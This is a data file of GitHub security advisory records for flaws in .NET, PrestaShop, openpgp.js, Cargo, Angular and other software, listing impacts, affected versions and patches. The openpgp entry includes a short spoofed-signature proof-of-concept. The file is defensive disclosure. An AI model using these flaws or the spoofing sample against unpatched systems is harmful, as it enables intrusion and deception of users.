1.4.0,GHSA-j8rm-cm55-qqj6,2023-08-11T20:54:45Z,2023-08-11T20:54:45Z,,['CVE-2023-35391'],.NET Information Disclosure Vulnerability,"# Microsoft Security Advisory CVE-2023-35391: .NET Information Disclosure Vulnerability ## Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET core 2.1, .NET 6.0 and, .NET 7.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A vulnerability exists in ASP.NET Core 2.1, .NET 6.0 and, .NET 7.0 applications using SignalR when redis backplane use might result in information disclosure. ## Announcement Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/267 ### Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. ## Affected software * Any .NET 7.0 application running on .NET 7.0.9 or earlier. * Any .NET 6.0 application running on .NET 6.0.20 or earlier. If your application uses the following package versions, ensure you update to the latest version of .NET. ### .NET 7 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.AspNetCore.SignalR.StackExchangeRedis](https://www.nuget.org/packages/Microsoft.AspNetCore.SignalR.StackExchangeRedis) | >= 7.0.0, <= 7.0.9 | 7.0.10 ### .NET 6 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.AspNetCore.SignalR.StackExchangeRedis](https://www.nuget.org/packages/Microsoft.AspNetCore.SignalR.StackExchangeRedis) | >= 6.0.0, <= 6.0.20 | 6.0.21 ### ASP.NET Core 2.1 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.AspNetCore.SignalR.Redis](https://www.nuget.org/packages/Microsoft.AspNetCore.SignalR.Redis) | < 1.0.40 | 1.0.40 ## Advisory FAQ ### How do I know if I am affected? If you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability. ### How do I fix the issue? * To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. * If you are using one of the affected packages, please update to the patched version listed above. * If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following; ``` .NET Core SDK (reflecting any global.json): Version: 6.0.300 Commit: 8473146e7d Runtime Environment: OS Name: Windows OS Version: 10.0.18363 OS Platform: Windows RID: win10-x64 Base Path: C:\Program Files\dotnet\sdk\6.0.300\ Host (useful for support): Version: 6.0.5 Commit: 8473146e7d .NET Core SDKs installed: 6.0.300 [C:\Program Files\dotnet\sdk] .NET Core runtimes installed: Microsoft.AspNetCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App] Microsoft.NETCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App] Microsoft.WindowsDesktop.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App] To install additional .NET Core runtimes or SDKs: https://aka.ms/dotnet-download ``` * If you're using .NET 7.0, you should download and install Runtime 7.0.10 or SDK 7.0.110 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0. * If you're using .NET 6.0, you should download and install Runtime 6.0.21 or SDK 6.0.316 (for Visual Studio 2022 v17.2) from https://dotnet.microsoft.com/download/dotnet-core/6.0. .NET 6.0 and and .NET 7.0 updates are also available from Microsoft Update. To access this either type ""Check for updates"" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. ## Other Information ### Reporting Security Issues If you have found a potential security issue in .NET 6.0 or .NET 7.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at . ### Support You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. ### Disclaimer The information provided in this advisory is provided ""as is"" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ### External Links [CVE-2023-35391]( https://www.cve.org/CVERecord?id=CVE-2023-35391) ### Revisions V1.0 (August 08, 2023): Advisory published. _Version 1.0_ _Last Updated 2023-08-08_","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.SignalR.StackExchangeRedis'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.SignalR.StackExchangeRedis'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.21'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.20'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.SignalR.Redis'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.40'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dotnet/aspnetcore/security/advisories/GHSA-j8rm-cm55-qqj6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35391'}, {'type': 'WEB', 'url': 'https://github.com/dotnet/announcements/issues/267'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/aspnetcore'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35391'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T20:54:45Z', 'nvd_published_at': None}" 1.4.0,GHSA-xrrh-h86w-pwfj,2023-08-24T22:03:57Z,2023-08-15T18:31:32Z,,['CVE-2023-38889'],Alluxio vulnerable to arbitrary code execution,An issue in Alluxio v.2.9.3 and before allows an attacker to execute arbitrary code via a crafted script to the username parameter of lluxio.util.CommonUtils.getUnixGroups(java.lang.String).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.alluxio:alluxio-parent'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.9.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38889'}, {'type': 'WEB', 'url': 'https://github.com/Alluxio/alluxio/issues/17766'}, {'type': 'PACKAGE', 'url': 'https://github.com/Alluxio/alluxio'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-15T20:01:44Z', 'nvd_published_at': None}" 1.4.0,GHSA-v4gr-v679-42p7,2023-08-09T14:39:21Z,2023-08-09T14:39:21Z,,['CVE-2023-39530'],PrestaShop file deletion via CustomerMessage,"### Impact It is possible to delete files from the server via the CustomerMessage API ### Patches 8.1.1 ### Found by Kto94 (via Yeswehack) ### Workarounds none ### References none","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-v4gr-v679-42p7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39530'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/commit/6ce750b2367a7309b6bf50166f1873cb86ad57e9'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrestaShop/PrestaShop'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:39:21Z', 'nvd_published_at': None}" 1.4.0,GHSA-52h8-c876-989c,2023-08-03T16:42:42Z,2023-08-03T06:30:23Z,,['CVE-2023-4127'],Answer has Race Condition within a Thread,Race Condition within a Thread in GitHub repository answerdev/answer prior to v1.1.1.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4127'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/47661dc8a356ce6aa7793f1bd950399292180182'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/cf7d19e3-1318-4c77-8366-d8d04a0b41ba'}]","{'cwe_ids': ['CWE-366'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T16:42:42Z', 'nvd_published_at': None}" 1.4.0,GHSA-ch3c-v47x-4pgp,2023-08-29T17:36:40Z,2023-08-29T17:36:40Z,,['CVE-2023-41037'],Cleartext Signed Message Signature Spoofing in openpgp,"### Impact OpenPGP Cleartext Signed Messages are cryptographically signed messages where the signed text is readable without special tools: ``` -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 This text is signed. -----BEGIN PGP SIGNATURE----- wnUEARMIACcFgmTkrNAJkInXCgj0fgcIFiEE1JlKzzDGQxZmmHkYidcKCPR+ BwgAAKXDAQDWGhI7tPbhB+jlKwe4+yPJ+9X8aWDUG60XFNi/w8T7ZgEAsAGd WJrkm/H5AXGZsqyqqO6IWGF0geTCd4mWm/CsveM= -----END PGP SIGNATURE----- ``` These messages typically contain a ""Hash: ..."" header declaring the hash algorithm used to compute the signature digest. OpenPGP.js up to v5.9.0 ignored any data preceding the ""Hash: ..."" texts when verifying the signature. As a result, malicious parties could add arbitrary text to a third-party Cleartext Signed Message, to lead the victim to believe that the arbitrary text was signed. A user or application is vulnerable to said attack vector if it verifies the CleartextMessage by only checking the returned `verified` property, discarding the associated `data` information, and instead _visually trusting_ the contents of the original message: ```js const cleartextMessage = ` -----BEGIN PGP SIGNED MESSAGE----- This text is not signed but you might think it is. Hash: SHA256 This text is signed. -----BEGIN PGP SIGNATURE----- wnUEARMIACcFgmTkrNAJkInXCgj0fgcIFiEE1JlKzzDGQxZmmHkYidcKCPR+ BwgAAKXDAQDWGhI7tPbhB+jlKwe4+yPJ+9X8aWDUG60XFNi/w8T7ZgEAsAGd WJrkm/H5AXGZsqyqqO6IWGF0geTCd4mWm/CsveM= -----END PGP SIGNATURE----- `; const message = await openpgp.readCleartextMessage({ cleartextMessage }); const verificationResult = await verifyCleartextMessage({ message, verificationKeys }); console.log(await verificationResult.verified); // output: true console.log(verificationResult.data); // output: 'This text is signed.' ``` Since `verificationResult.data` would always contain the actual signed data, users and apps that check this information are not vulnerable. Similarly, given a CleartextMessage object, retrieving the data using `getText()` or the `text` field returns only the contents that are considered when verifying the signature. Finally, re-armoring a CleartextMessage object (using `armor()` will also result in a ""sanitised"" version, with the extraneous text being removed. Because of this, we consider the vulnerability impact to be very limited when the CleartextMessage is processed programmatically; this is reflected in the Severity CVSS assessment, specifically in the scope's score (""Unchanged""). ### Patches - v5.10.1 (current stable version) will reject messages when calling `openpgp.readCleartextMessage()` - v4.10.11 (legacy version) will reject messages when calling `openpgp.cleartext.readArmored()` ### Workarounds Check the contents of `verificationResult.data` to see what data was actually signed, rather than visually trusting the contents of the armored message. ### References Similar CVE: https://sec-consult.com/vulnerability-lab/advisory/cleartext-message-spoofing-in-go-cryptography-libraries-cve-2019-11841/ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'openpgp'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.10.11'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'openpgp'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.10.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/openpgpjs/openpgpjs/security/advisories/GHSA-ch3c-v47x-4pgp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-41037'}, {'type': 'WEB', 'url': 'https://github.com/openpgpjs/openpgpjs/commit/6b43e02a254853f5ff508ebd1b07541f78b7c566'}, {'type': 'PACKAGE', 'url': 'https://github.com/openpgpjs/openpgpjs'}, {'type': 'WEB', 'url': 'https://github.com/openpgpjs/openpgpjs/releases/tag/v4.10.11'}, {'type': 'WEB', 'url': 'https://github.com/openpgpjs/openpgpjs/releases/tag/v5.10.1'}]","{'cwe_ids': ['CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-29T17:36:40Z', 'nvd_published_at': None}" 1.4.0,GHSA-w5vr-6qhr-36cc,2023-08-14T21:10:29Z,2023-08-14T21:10:29Z,,[],`ed25519-dalek` Double Public Key Signing Function Oracle Attack,"Versions of `ed25519-dalek` prior to v2.0 model private and public keys as separate types which can be assembled into a `Keypair`, and also provide APIs for serializing and deserializing 64-byte private/public keypairs. Such APIs and serializations are inherently unsafe as the public key is one of the inputs used in the deterministic computation of the `S` part of the signature, but not in the `R` value. An adversary could somehow use the signing function as an oracle that allows arbitrary public keys as input can obtain two signatures for the same message sharing the same `R` and only differ on the `S` part. Unfortunately, when this happens, one can easily extract the private key. Revised public APIs in v2.0 of `ed25519-dalek` do NOT allow a decoupled private/public keypair as signing input, except as part of specially labeled ""hazmat"" APIs which are clearly labeled as being dangerous if misused. ",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'ed25519-dalek'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/MystenLabs/ed25519-unsafe-libs'}, {'type': 'PACKAGE', 'url': 'https://github.com/dalek-cryptography/ed25519-dalek'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2022-0093.html'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-14T21:10:29Z', 'nvd_published_at': None}" 1.4.0,GHSA-g6w6-h933-4rc5,2023-08-03T19:44:52Z,2023-08-03T19:44:52Z,,[],Soketi was exposed to Sandbox Escape vulnerability via vm2,"### Impact _What kind of vulnerability is it? Who is impacted?_ Anyone who might have used Soketi with the `cluster` driver (or through PM2). ### Patches _Has the problem been patched? What versions should users upgrade to?_ Get the latest version of Soketi. ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ None. It's advised to upgrade to the latest version. ### References _Are there any links users can visit to find out more?_ - https://github.com/advisories/GHSA-cchq-frgv-rjh5 - https://github.com/patriksimek/vm2/issues/533 - https://github.com/Unitech/pm2/issues/5643 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '@soketi/soketi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/soketi/soketi/security/advisories/GHSA-g6w6-h933-4rc5'}, {'type': 'WEB', 'url': 'https://github.com/Unitech/pm2/issues/5643'}, {'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/issues/533'}, {'type': 'WEB', 'url': 'https://github.com/soketi/soketi/pull/927'}, {'type': 'WEB', 'url': 'https://github.com/soketi/soketi/commit/de12bff706c0d62e6a57dc1c7be3c4f014d0093a'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-cchq-frgv-rjh5'}, {'type': 'PACKAGE', 'url': 'https://github.com/soketi/soketi'}, {'type': 'WEB', 'url': 'https://github.com/soketi/soketi/releases/tag/1.6.0'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T19:44:52Z', 'nvd_published_at': None}" 1.4.0,GHSA-m9r4-3fg7-pqm2,2023-08-09T14:35:36Z,2023-08-09T14:35:36Z,,['CVE-2023-39525'],PrestaShop path traversal,"### Impact In the back office, files can be compromised using path traversal by replaying the import file deletion query with a specified file path, using traversal path. ### Patches 8.1.1 ### Found by Aleksey Solovev (Positive Technologies) ### Workarounds none ### References none","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-m9r4-3fg7-pqm2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39525'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/commit/c7c9a5110421bb2856f4d312ecce192d079b5ec7'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrestaShop/PrestaShop'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:35:36Z', 'nvd_published_at': None}" 1.4.0,GHSA-r3hf-q8q7-fv2p,2023-08-09T12:51:51Z,2023-08-09T12:51:51Z,,[],Angular critical CSS inlining Cross-site Scripting Vulnerability Advisory,"### Impact Angular Universal applications on 16.1.0 and 16.1.1 using critical CSS inlining are vulnerable to a [cross-site scripting (XSS)](https://owasp.org/www-community/attacks/xss/) attack where an attacker can trick another user into visiting a page which injects malicious JavaScript. Angular CLI applications without Universal do perform critical CSS inlining as well, however exploiting this requires a malicious actor to already have access to modify source code directly. ### Patches `@nguniversal/common` should be upgraded to 16.1.2 or higher. 16.2.0-rc.0 is safe. ### Workarounds The easiest solution is likely to upgrade Universal to 16.1.2 or downgrade to 16.0.x or lower. Alternatively you can [override](https://docs.npmjs.com/cli/v9/configuring-npm/package-json#overrides) specifically the `critters` dependency with version `0.0.20` in your `package.json`. ```json { ""overrides"": { ""critters"": ""0.0.20"" } } ``` ### References * [Angular Blog Post](https://blog.angular.io/notice-of-xss-issue-affecting-angular-universal-16-1-0-16-1-1-95dbae068f)",[],"[{'package': {'ecosystem': 'npm', 'name': '@nguniversal/common'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '16.1.0'}, {'fixed': '16.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/angular/universal/security/advisories/GHSA-r3hf-q8q7-fv2p'}, {'type': 'PACKAGE', 'url': 'https://github.com/angular/universal'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T12:51:51Z', 'nvd_published_at': None}" 1.4.0,GHSA-r285-q736-9v95,2023-09-07T18:51:03Z,2023-08-31T00:30:17Z,,['CVE-2023-39137'],Filename spoofing in archive,An issue in Archive v3.3.7 allows attackers to spoof zip filenames which can lead to inconsistent filename parsing.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Pub', 'name': 'archive'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.7'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39137'}, {'type': 'WEB', 'url': 'https://github.com/brendan-duncan/archive/issues/266'}, {'type': 'WEB', 'url': 'https://github.com/brendan-duncan/archive/commit/0d17b270a3c33d3bed56cadd9a43da7717ab11f4'}, {'type': 'WEB', 'url': 'https://blog.ostorlab.co/zip-packages-exploitation.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/brendan-duncan/archive'}, {'type': 'WEB', 'url': 'https://ostorlab.co/vulndb/advisory/OVE-2023-3'}, {'type': 'WEB', 'url': 'https://www.rapid7.com/db/modules/exploit/windows/fileformat/winrar_name_spoofing/'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-31T01:43:38Z', 'nvd_published_at': None}" 1.4.0,GHSA-qfw7-pfxx-h9q2,2023-08-23T20:07:41Z,2023-08-14T18:32:59Z,,['CVE-2023-40311'],OpenNMS vulnerable to Cross-site Scripting,"Multiple stored XSS were found on different JSP files with unsanitized parameters in OpenMNS Horizon 31.0.8 and versions earlier than 32.0.2 on multiple platforms that allow an attacker to store on database and then load on JSPs or Angular templates. The solution is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet. OpenNMS thanks Jordi Miralles Comins for reporting this issue. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms-webapp'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '31.0.8'}, {'fixed': '32.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40311'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/6365'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/6366'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/6ccc5de1a23d440560e0f09dfd94f8392c21e70d'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/c67d1cae2fa1fb806c9d422f6e6fbf4ebfde6b60'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenNMS/opennms'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-14T21:12:09Z', 'nvd_published_at': None}" 1.4.0,GHSA-xw2r-f8xv-c8xp,2023-08-09T14:37:16Z,2023-08-09T14:37:16Z,,['CVE-2023-39527'],PrestaShop XSS injection through Validate::isCleanHTML method,"### Impact xss injection through `isCleanHTML` method ### Patches 1.7.8.10 8.0.5 8.1.1 ### Found by Aleksey Solovev (Positive Technologies) ### Workarounds ### References ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.1.0'}, {'fixed': '8.1.1'}]}], 'versions': ['8.1.0']}, {'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.0.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.8.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-xw2r-f8xv-c8xp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39527'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/commit/afc14f8eaa058b3e6a20ac43e033ee2656fb88b4'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrestaShop/PrestaShop'}]","{'cwe_ids': ['CWE-116'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:37:16Z', 'nvd_published_at': None}" 1.4.0,GHSA-j3xp-wfr4-hx87,2023-08-03T16:30:52Z,2023-08-03T16:30:52Z,,['CVE-2023-38497'],Cargo not respecting umask when extracting crate archives,"The Rust Security Response WG was notified that Cargo did not respect the umask when extracting crate archives on UNIX-like systems. If the user downloaded a crate containing files writeable by any local user, another local user could exploit this to change the source code compiled and executed by the current user. This vulnerability has been assigned CVE-2023-38497. ## Overview In UNIX-like systems, each file has three sets of permissions: for the user owning the file, for the group owning the file, and for all other local users. The ""[umask][1]"" is configured on most systems to limit those permissions during file creation, removing dangerous ones. For example, the default umask on macOS and most Linux distributions only allow the user owning a file to write to it, preventing the group owning it or other local users from doing the same. When a dependency is downloaded by Cargo, its source code has to be extracted on disk to allow the Rust compiler to read as part of the build. To improve performance, this extraction only happens the first time a dependency is used, caching the pre-extracted files for future invocations. Unfortunately, it was discovered that Cargo did not respect the umask during extraction, and propagated the permissions stored in the crate archive as-is. If an archive contained files writeable by any user on the system (and the system configuration didn't prevent writes through other security measures), another local user on the system could replace or tweak the source code of a dependency, potentially achieving code execution the next time the project is compiled. ## Affected Versions All Rust versions before 1.71.1 on UNIX-like systems (like macOS and Linux) are affected. Note that additional system-dependent security measures configured on the local system might prevent the vulnerability from being exploited. Users on Windows and other non-UNIX-like systems are not affected. ## Mitigations We recommend all users to update to Rust 1.71.1, which will be released later today, as it fixes the vulnerability by respecting the umask when extracting crate archives. If you build your own toolchain, patches for 1.71.0 source tarballs are [available here][2]. To prevent existing cached extractions from being exploitable, the Cargo binary included in Rust 1.71.1 or later will purge the caches it tries to access if they were generated by older Cargo versions. If you cannot update to Rust 1.71.1, we recommend configuring your system to prevent other local users from accessing the Cargo directory, usually located in `~/.cargo`: ``` chmod go= ~/.cargo ``` ## Acknowledgments We want to thank Addison Crump for responsibly disclosing this to us according to the [Rust security policy][3]. We also want to thank the members of the Rust project who helped us disclose the vulnerability: Weihang Lo for developing the fix; Eric Huss for reviewing the fix; Pietro Albini for writing this advisory; Pietro Albini, Manish Goregaokar and Josh Stone for coordinating this disclosure; Josh Triplett, Arlo Siemen, Scott Schafer, and Jacob Finkelman for advising during the disclosure. [1]: https://en.wikipedia.org/wiki/Umask [2]: https://github.com/rust-lang/wg-security-response/tree/main/patches/CVE-2023-38497 [3]: https://www.rust-lang.org/policies/security","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'cargo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.72.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.72.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/rust-lang/cargo/security/advisories/GHSA-j3xp-wfr4-hx87'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38497'}, {'type': 'WEB', 'url': 'https://github.com/rust-lang/cargo/pull/12443'}, {'type': 'WEB', 'url': 'https://github.com/rust-lang/cargo/commit/d78bbf4bde3c6b95caca7512f537c6f9721426ff'}, {'type': 'WEB', 'url': 'https://en.wikipedia.org/wiki/Umask'}, {'type': 'PACKAGE', 'url': 'https://github.com/rust-lang/cargo'}, {'type': 'WEB', 'url': 'https://github.com/rust-lang/wg-security-response/tree/main/patches/CVE-2023-38497'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGKE6PGM4HIQUHPJRBQAHMELINSGN4H4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QMEXGUGPW5OBSQA6URTBNDSU3RAEFOZ4/'}, {'type': 'WEB', 'url': 'https://www.rust-lang.org/policies/security'}]","{'cwe_ids': ['CWE-278', 'CWE-732'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T16:30:52Z', 'nvd_published_at': None}" 